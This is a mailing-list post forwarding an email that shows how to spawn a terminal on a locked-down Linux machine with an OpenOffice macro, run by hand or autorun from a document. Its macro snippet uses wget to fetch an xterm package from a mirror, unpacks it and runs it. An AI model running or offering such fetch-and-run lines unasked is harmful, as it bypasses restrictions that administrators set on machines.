Some friends asked me some tips for how to make a locked down machine that doesn't allow the user to execute anything from the GUI and doesn't have a terminal emulator installed into starting a terminal, using an allowed application, OpenOffice. The below is hardly a security vulnerability (unless you count "if the GUI can't do it, then the user can't either!" a real security attempt), but it is a method that could be helpful in making different sorts of things this mailing list seems to like. So here ya go. ---------- Forwarded message ---------- From: Jason A. Donenfeld <Jason@zx2c4.com> Subject: Spawn a terminal using OpenOffice, just for funzies. Howdy Boys and Girls, So you want to use OpenOffice.org to spawn a command line terminal on a computer that has no X terminal emulator installed or an easy way to run apps, eh? *Method 1: *Run the macro in a new document. See method-1.ogv <http://data.zx2c4.com/openoffice-execute/method-1.ogv> *Method 2: *Have the macro autorun from a preexisting file. Downside: requires low macro security option. See method-2.ogv <http://data.zx2c4.com/openoffice-execute/method-2.ogv> See terminal-spawn.odt<http://data.zx2c4.com/openoffice-execute/terminal-spawn.odt> Helpful macro snippet: Shell("sh -c 'dir=`mktemp -d`; cd $dir; wget http://mirror.pnl.gov/ubuntu//pool/main/x/xterm/xterm_256-1ubuntu1_i386.deb; ar x xterm_256-1ubuntu1_i386.deb; tar xzf data.tar.gz; cd /; $dir/usr/bin/xterm & rm -rf $dir'", 1) Have fun with this trick. Jason